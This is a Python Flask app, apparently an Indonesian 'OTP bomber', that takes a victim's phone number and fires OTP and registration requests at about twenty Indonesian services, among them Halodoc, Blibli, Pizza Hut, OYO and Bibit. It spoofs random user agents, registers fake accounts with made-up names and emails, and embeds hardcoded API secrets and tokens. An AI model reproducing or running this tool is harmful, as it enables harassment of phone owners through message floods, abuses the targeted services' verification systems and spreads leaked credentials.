from flask import Flask, render_template, request

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        number = request.form['phone_number']
        # Logika untuk mengirim OTP dan mendapatkan respound
        # Misalnya menggunakan fungsi yang sudah Anda buat sebelumnya
        respound = send_otp_and_get_respond(number)
        return render_template('index.html', respound=respound)
    return render_template('index.html', respound=None)

def send_otp_and_get_respond(number):
    import requests
    import json
    import random
    import re
    from fake_useragent import UserAgent
    
    ua = UserAgent()
    freya = ua.random
    
    pos=requests.post("https://api.dagangan.com/v2/users/sms", headers = {"Host": "api.dagangan.com", "accept": "application/json", "content-type": "application/json", "content-length": "50", "accept-encoding": "gzip", "user-agent": freya, "x-newrelic-id": "Vg8AVlRVDhAIUVFVAAEGX10="}, json = {"phone": f"0{number}", "otp_method": "missedcall"}).text
    namk = random.choice(["Jamal","Ammr","Pardi","Xenzi","Vindra","Saipul","Farhan"])
    mailk = random.choice(["jamal321@gmail.com","vindraid@gmail.com","ammar230@gmail.com","santrip109@gmail.com"])
    head7={'Host': 'order.kfcku.com','content-length': '137','sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"','accept': 'application/json, text/plain, */*','content-type': 'application/json','culturecode': 'id','sec-ch-ua-mobile': '?1','user-agent': freya,'sec-ch-ua-platform': '"Linux"','origin': 'https://order.kfcku.co','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://order.kfcku.com/account/register','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5,es;q=0.4'}
    cokf={'cookie': '_ga=GA1.1.2145612061.1704219246','cookie': 'G_ENABLED_IDPS=google','cookie': '_ga_VDQKXM3LBX=GS1.1.1704219245.1.1.1704219399.0.0.0'}
    data=json.dumps({"Phone":"+0"+number,"Email":mailk,"BirthDate":331603200,"FullName":namk,"Gender":"M","Password":"zNGqur8xRDSnSm2"})
    pos=requests.post("https://order.kfcku.com/api/register",headers=head7,cookies=cokf,data=data).text
    head8={'Host': 'order.kfcku.com','content-length': '70','sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"','accept': 'application/json, text/plain, */*','content-type': 'application/json','culturecode': 'id','sec-ch-ua-mobile': '?1','user-agent': freya,'sec-ch-ua-platform': '"Android"','origin': 'https://order.kfcku.com','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://order.kfcku.com/account/register','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5,es;q=0.4'}
    cokf2={'cookie': '_ga=GA1.1.2145612061.1704219246','cookie': 'G_ENABLED_IDPS=google','cookie': '_ga_VDQKXM3LBX=GS1.1.1704219245.1.1.1704219399.0.0.0'}
    data2=json.dumps({"PhoneNumber":"+0"+number,"source":"register","token":"whatsapp"})
    pos2=requests.post("https://order.kfcku.com/api/requestotp",headers=head8,cookies=cokf2,data=data2).text
    xsrf = requests.get("https://magneto.api.halodoc.com/api/v1/users/status").cookies.get_dict()
    headhaldoc = {"referer": "https://www.halodoc.com","content-type": "application/json","x-xsrf-token": xsrf['XSRF-TOKEN']}
    paylodhaldoc = {"phone_number": "+62"+number,"channel": "whatsapp"}
    cokihaldoc = {"cookie": '_gcl_au=1.1.935637007.1686465186; _gid=GA1.2.1888372629.1686465187; ab.storage.deviceId.1cc23a4b-a089-4f67-acbf-d4683ecd0ae7={"g":"9ade8176-03c1-dd87-f8d7-c0c3f60f861a","c":1686465187381,"l":1686465187381}; XSRF-TOKEN='+xsrf['XSRF-TOKEN']+'; afUserId=31b1ff72-9c27-4492-a787-7a895c0d422e-p; AF_SYNC=1686465191318; _ga_02NBJNEKVH=GS1.1.1686465187.1.1.1686465223.0.0.0; amp_394863=WECZG4ZhC4dZKUWVGE4Ogh...1h2kii76k.1h2kiiai8.3.0.3; ab.storage.sessionId.1cc23a4b-a089-4f67-acbf-d4683ecd0ae7={"g":"c13c57ed-4fbf-80d3-7b17-19eb5a8fcedc","e":1686467027367,"c":1686465187365,"l":1686465227367}; _ga=GA1.2.1084460534.1686465187'}
    response = requests.post("https://magneto.api.halodoc.com/api/v1/users/authentication/otp/requests",headers=headhaldoc,data=json.dumps(paylodhaldoc),cookies=cokihaldoc).json()
    tokoko=requests.post("https://api-v2.bukuwarung.com/api/v2/auth/otp/send",headers={'Host':'api-v2.bukuwarung.com','content-length':'198','sec-ch-ua':'"Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"','sec-ch-ua-mobile':'?0','user-agent': freya,'content-type':'application/json','accept':'application/json, text/plain, */*','x-app-version-code':'5050','x-app-version-name':'android','buku-origin':'tokoko','sec-ch-ua-platform':'"Linux"','origin':'https://web.tokoko.id','sec-fetch-site':'cross-site','sec-fetch-mode':'cors','sec-fetch-dest':'empty','referer':'https://web.tokoko.id/','accept-encoding':'gzip, deflate, br','accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',},data=json.dumps({"action":"LOGIN_OTP","countryCode":"+62","deviceId":"test-1","method":"WA","phone":number,"clientId":"2e3570c6-317e-4524-b284-980e5a4335b6","clientSecret":"S81VsdrwNUN23YARAL54MFjB2JSV2TLn"})).text
    bibit=requests.post("https://api.bibit.id/auth/register/phone",headers={'Host':'api.bibit.id','accept':'application/json, text/plain, */*','content-type':'application/json','sec-ch-ua-mobile':'?1','x-platform':'web','user-agent': freya,'sec-ch-ua-platform':'"Android"','origin':'https://app.bibit.id','sec-fetch-site':'same-site','sec-fetch-mode':'cors','sec-fetch-dest':'empty','referer':'https://app.bibit.id/','accept-encoding':'gzip, deflate, br','accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'},data=json.dumps({"code":"62","phone":number,"via":"whatsapp","recaptcha_token":"","recaptcha_type":"v3"})).text #bibit api
    yoyo = requests.post("https://identity-gateway.oyorooms.com/identity/api/v1/otp/generate_by_phone?locale=id",headers={"Host": "identity-gateway.oyorooms.com","consumer_host": "https://www.oyorooms.com","accept-language": "id","access_token": "SFI4TER1WVRTakRUenYtalpLb0w6VnhrNGVLUVlBTE5TcUFVZFpBSnc=","User-Agent": freya,"Content-Type": "application/json","accept": "*/*","origin": "https://www.oyorooms.com","referer": "https://www.oyorooms.com/login","Accept-Encoding": "gzip, deflate, br"},data=json.dumps({"phone":f"0"+number,"country_code": "+62","country_iso_code": "ID","nod": "4","send_otp": "true","devise_role": "Consumer_Guest"})).text
    moka = requests.post("https://service.mokapos.com/account/v1/verification/phone/send",headers={  "accept": "application/json, text/plain, */*","authorization": "undefined","save-data": "on","user-agent": freya,"content-type": "application/json;charset=UTF-8"},data=json.dumps({"phone_number":f"+62"+number})).text
    ma=requests.post("https://beryllium.mapclub.com/api/member/registration/sms/otp",headers={"Host":"beryllium.mapclub.com","content-type":"application/json","accept-language":"en-US","accept":"application/json, text/plain, */*","user-agent": freya,"origin":"https://www.mapclub.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.mapclub.com/","accept-encoding":"gzip, deflate, br"},data=json.dumps({"account":number})).text
    dekor2=requests.post("https://auth.dekoruma.com/api/v1/register/request-otp-phone-number/?format=json",headers={"Host":"auth.dekoruma.com","save-data":"on","user-agent": freya,"content-type":"application/json","accept":"*/*","origin":"https://m.dekoruma.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.dekoruma.com/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phoneNumber":"+62"+number,"platform":"sms"})).text
    req3 = requests.post('https://www.alodokter.com/login-with-phone-number', headers={'Host': 'www.alodokter.com','content-length': '33','x-csrf-token': 'UG8hv2kV0R2CatKLXYPzT1isPZuGHVJi8sjnubFFdU1YvsHKrmIyRz6itHgNYuuBbbgSsCmfJWktrsfSC9SaGA==','sec-ch-ua-mobile': '?1','user-agent': freya,'content-type': 'application/json','accept': 'application/json','save-data': 'on','origin': 'https://www.alodokter.com','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://www.alodokter.com/login-alodokter','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en;q=0.8'},data=json.dumps({"user": {"phone": "0"+number}})).text
    pizzahut=requests.post('https://api-prod.pizzahut.co.id/customer/v1/customer/register', headers={'Host': 'api-prod.pizzahut.co.id','content-length': '157','x-device-type': 'PC','sec-ch-ua-mobile': '?1','x-platform': 'WEBMOBILE','x-channel': '2','content-type': 'application/json;charset=UTF-8','accept': 'application/json','x-client-id': 'b39773b0-435b-4f41-80e9-163eef20e0ab','user-agent': freya,'number -lang': 'en','save-data': 'on','x-device-id': 'web','origin': 'https://www.pizzahut.co.id','sec-fetch-site': 'same-site','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://www.pizzahut.co.id/','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en;q=0.8'},data=json.dumps({  "email": "oidjiwa1@gmail.com",  "first_name": "Xenzi",  "last_name": "Wokwokw",  "password": "Aldi++\\/67",  "phone": "0"+number,  "birthday": "2000-01-02"})).text
    bli=requests.post("https://www.blibli.com/backend/common/users/_request-otp",headers={"Host":"www.blibli.com","content-length":"27","accept":"application/json, text/plain, */*","content-type":"application/json;charset=UTF-8","sec-ch-ua-mobile":"?1","user-agent": freya,"sec-ch-ua-platform":"Android","origin":"https://www.blibli.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.blibli.com/login?ref=&logonId=0"+number,"accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"username":"0"+number})).text
    ha=requests.post("https://pluang.com/api/user/register/send-otp",headers={'Host':'pluang.com','content-length':'112','sec-ch-ua':'"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"','sec-ch-ua-mobile':'?1','user-agent': freya,'sec-ch-ua-platform':'Android','content-type':'application/json','accept':'*/*','origin':'https://pluang.com','sec-fetch-site':'same-origin','sec-fetch-mode':'cors','sec-fetch-dest':'empty','referer':'https://pluang.com/register','accept-encoding':'gzip, deflate, br','accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'},cookies={"cookie":"_gcl_au=1.1.634793654.1661960345","cookie":"_ga=GA1.2.217955334.1661960346","cookie":"_gid=GA1.2.1904059940.1661960346","cookie":"_gat_gtag_UA_124743364_3=1","cookie":"_fbp=fb.1.1661960347395.1573571703","cookie":"environment=production","cookie":"language=in","cookie":"WZRK_G=abf62dd1bf5f41edaa930f04872d1884","cookie":"cebs=1","cookie":"_tt_enable_cookie=1","cookie":"_ttp=ef83fe23-1e62-4741-9339-c077fd6d2076","cookie":"WZRK_S_R57-4Z9-9W6Z=%7B%22p%22%3A1%2C%22s%22%3A1661960351%2C%22t%22%3A1661960350%7D","cookie":"cebsp=1","cookie":"_ce.s=v~2dbcd906fa5fb9b378ebbd2642a150297d12fd70~vpv~0~v11slnt~1661960352042","cookie":"_ga_3RX02MCRS0=GS1.1.1661960345.1.1.1661960362.43.0.0","cookie":"_ga_824G2HJWD9=GS1.1.1661960346.1.1.1661960362.0.0.0","cookie":"_ga_EHTZ6P30C7=GS1.1.1661960346.1.1.1661960362.0.0.0","cookie":"_ga_ZXS1PKZ40M=GS1.1.1661960346.1.1.1661960362.0.0.0"},data=json.dumps({"name":"Shshshiskabzbz","email":"oidjiwa1@gmail.com","phone":"0"+number,"csrfToken":"pluangCsrfToken"})).text
    singsing=requests.post("https://api.momobil.id/users/otp/send",headers={"Host":"api.momobil.id","Connection":"keep-alive","Content-Length":"39","sec-ch-ua-mobile":"?1","User-Agent": freya,"sec-ch-ua-platform":"Android","Content-Type":"application/json","Accept":"*/*","Origin":"https://momobil.id","Sec-Fetch-Site":"same-site","Sec-Fetch-Mode":"cors","Sec-Fetch-Dest":"empty","Referer":"https://momobil.id/","Accept-Encoding":"gzip, deflate, br","Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"to":"0"+number,"type":"register"})).text
    posting=requests.post("https://api.qoala.app/api/registrations",headers={"Host":"api.qoala.app","content-length":"202","accept":"application/json, text/plain, */*","content-type":"application/json;charset=UTF-8","sec-ch-ua-mobile":"?1","user-agent": freya,"sec-ch-ua-platform":"Android","origin":"https://www.qoala.app","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.qoala.app/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"fullName":"Hsjsnsns","email":"oidjiwa1@gmail.com","phoneNumber":"+62"+number,"identityType":"KTP","nationality":"ID","password":"Abc167@ggwp","passwordConfirmation":"Abc167@ggwp","lang":"id"})).text
    last=json.dumps([{"operationName":"generateOTP","variables":{"destinationType":"sms","identity":"+62"+number},"query":"mutation generateOTP($destinationType: String!, $identity: String!) {\n  generateOTP(destinationType: $destinationType, identity: $identity) {\n    id\n    __typename\n  }\n}"}])
    poss = requests.post("https://ua.ctcorpmpc.com/blade-user/api/user/getotp",headers={"Host":"ua.ctcorpmpc.com","Connection":"keep-alive","Content-Length":"148","Blade-Auth":"Bearer 22222","sec-ch-ua-mobile":"?1","Authorization":"Basic c3dvcmQ6c3dvcmRfc2VjcmV0","Content-Type":"application/json;charset=UTF-8","User-Agent": freya,"X-requested-With":"XMLHttpRequest","Tenant-Id":"000000","sec-ch-ua-platform":"Android","Accept":"*/*","Origin":"https://ua.ctcorpmpc.com","Sec-Fetch-Site":"same-origin","Sec-Fetch-Mode":"cors","Sec-Fetch-Dest":"empty","Referer":"https://ua.ctcorpmpc.com/cas-web/","Accept-Encoding":"gzip, deflate, br","Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phoneNo":number,"tplId":"4001001","tms":1662434407722,"requestId":"6e1b8c1c-fe2f-4418-851b-d31af02f0c221662434407722","intlPhoneCode":"62"})).text
    why=requests.post("https://www.misteraladin.com/api/members/v2/otp/request",headers={'Host':'www.misteraladin.com','content-length':'81','sec-ch-ua':'"Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"','accept-language':'id','sec-ch-ua-mobile':'?0','authorization':'Bearer null','content-type':'application/json;charset=UTF-8','accept':'application/json, text/plain, */*','user-agent': freya,'x-platform':'web','sec-ch-ua-platform':'"Linux"','origin':'https://www.misteraladin.com','sec-fetch-site':'same-origin','sec-fetch-mode':'cors','sec-fetch-dest':'empty','referer':'https://www.misteraladin.com/register','accept-encoding':'gzip, deflate, br',},data=json.dumps({"phone_number_country_code":"62","phone_number":number,"type":"register"})).text
    poll=requests.post("https://api.myfave.com/api/fave/v3/auth",headers={'Host':'api.myfave.com','Connection':'keep-alive','Content-Length':'26','sec-ch-ua':'"Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"','x-user-agent':'Fave-PWA/v1.0.0','content-type':'application/json','sec-ch-ua-mobile':'?1','User-Agent': freya,'sec-ch-ua-platform':'"Android"','Accept':'*/*','Origin':'https://myfave.com','Sec-Fetch-Site':'same-site','Sec-Fetch-Mode':'cors','Sec-Fetch-Dest':'empty','Referer':'https://myfave.com/','Accept-Encoding':'gzip, deflate, br','Accept-Language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'},data=json.dumps({"phone":"+62"+number})).text
    reqi=requests.post("https://auth.sampingan.co/v1/otp",data=json.dumps({"channel":"WA","country_code":"+62","phone_number":number}),headers={"Host":"auth.sampingan.co","domain-name":"auth-svc","app-auth":"Skip","content-type":"application/json; charset=UTF-8","user-agent": freya,"accept":"application/vnd.full+json","accept":"application/json","content-type":"application/vnd.full+json","content-type":"application/json","app-version":"2.1.2","app-platform":"Android"}).text
    pospp=requests.post("https://wapi.ruparupa.com/auth/generate-otp",headers={"Host":"wapi.ruparupa.com","content-length":"120","sec-ch-ua-mobile":"?0","authorization":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiYTQyNDMyZDctZjI5NS00Zjk0LTllYTYtZjlkZmM0ZDgwY2RiIiwiaWF0IjoxNjU3MTI0OTQwLCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.4j37JW_U6DVynJ0wCxHmVNI8SbpsaeUgqk3SEihJmvs","content-type":"application/json","x-company-name":"odi","accept":"application/json","user-agent": freya,"user-platform":"desktop","x-frontend-type":"desktop","sec-ch-ua-platform":"Linux","origin":"https://www.ruparupa.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.ruparupa.com/verification?page=otp-choices","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":"0"+number,"action":"register","channel":"message","email":"oidjiwa1@gmail.com","token":"","customer_id":"0","is_resend":0})).text

if __name__ == '__main__':
    app.run(debug=True)
